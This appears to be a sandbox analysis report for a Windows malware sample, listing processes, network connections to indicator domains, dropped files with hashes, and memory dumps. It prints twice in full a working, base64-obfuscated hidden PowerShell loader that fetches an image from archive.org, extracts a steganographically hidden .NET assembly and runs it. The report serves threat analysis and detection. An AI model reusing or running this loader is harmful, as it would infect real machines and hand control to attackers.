"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | deadpoolstart.lovestoblog.com | udp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| CO | 181.131.217.63:7021 | deadpoolstart2064.duckdns.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
Files
memory/1620-0-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-9-0x0000021E8D6C0000-0x0000021E8D6E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moyeartk.5o1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1620-10-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-11-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-12-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-13-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-14-0x0000021EAE370000-0x0000021EAE6EE000-memory.dmp
memory/1620-15-0x0000021E8D0F0000-0x0000021E8D0FE000-memory.dmp
C:\Users\Public\Downloads\agnosticism.js
| MD5 | 9b49b1a2e0327767db6dc4883654dd22 |
| SHA1 | 486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba |
| SHA256 | 761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30 |
| SHA512 | b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206 |
memory/1620-20-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/4552-19-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4552-23-0x0000000005790000-0x000000000582C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8db89638d25eb835085ddae51b7df0ff |
| SHA1 | 6b06c8b024f2b5bbcb0ca2323aac080ca2b101dd |
| SHA256 | b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35 |
| SHA512 | 64919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7b5fe43dda2544ecf1948d765ad2a49a |
| SHA1 | b9a52f5a2981e7dcc1046e91fd3f78e216bf9578 |
| SHA256 | 5d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830 |
| SHA512 | 8146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926 |
memory/4552-34-0x0000000005DF0000-0x0000000005E56000-memory.dmp
memory/4552-35-0x0000000006910000-0x00000000069A2000-memory.dmp
memory/4552-36-0x0000000006F60000-0x0000000007506000-memory.dmp